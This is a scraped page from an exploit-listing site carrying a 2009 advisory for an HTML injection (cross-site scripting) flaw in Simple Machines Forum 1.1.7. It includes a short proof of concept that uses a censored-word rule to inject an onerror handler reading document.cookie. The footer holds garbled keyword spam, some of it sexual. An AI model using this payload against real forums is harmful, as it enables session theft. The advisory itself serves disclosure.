about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Simple Machines Forum Censored Words HTML Injection Vulnerability


Title Simple Machines Forum Censored Words HTML Injection Vulnerability
Published 2009-02-03-12:00AM
Updated 2009-02-03-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Eduardo Vela
Vulnerable  Simple Machines SMF 1.1.7
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example is available:Add the following censored word:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)and create a post with the following:
[img]http://www.test.xss/[/img]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 23:09:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexwallpap Www.Dogwit 2.22 iiforelugo www.gamejd www.bjmeil Asia sex v port 5901 saxual CMS is Fre For vidio Namitasexy sex_girl CMS is Fre Server: Ap xxx falim My_eGaller affidavit CMS is Fre Sabdrimer 200 /compo Www.tamil+ bathroom c indiancoll www.has9.c www.xvideo r...pnic.n free sex v Film porn I would lo hindi six adsdshttp: power girl free sex v 200 /compo Crack Data p i c s e search/exp CMS is Fre search/exp www.maphn. india sex Fb+area Anak sma p Teenpussyp &a GET /galle SSH-2.0-Op castro king size